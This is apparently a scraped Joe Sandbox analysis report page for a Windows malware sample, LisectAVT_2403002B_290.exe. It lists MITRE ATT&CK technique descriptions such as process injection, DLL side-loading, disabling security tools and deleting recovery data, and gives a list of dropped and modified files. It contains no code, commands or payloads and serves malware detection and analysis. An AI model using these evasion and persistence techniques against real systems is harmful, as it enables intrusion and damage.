Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002B_290.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_XBVdJN.exe_e5e08bf8fb123f7db911eb6aa6ab71c5afa27129_87f585be_382370fe-9777-448a-8905-7ec652631733\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER175D.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER178D.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k2[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k2[2].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k3[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k4[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k5[1].rar

Windows Analysis Report
LisectAVT_2403002B_290.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.This may deny access to available backups and recovery options.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Snapshot: Snapshot Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre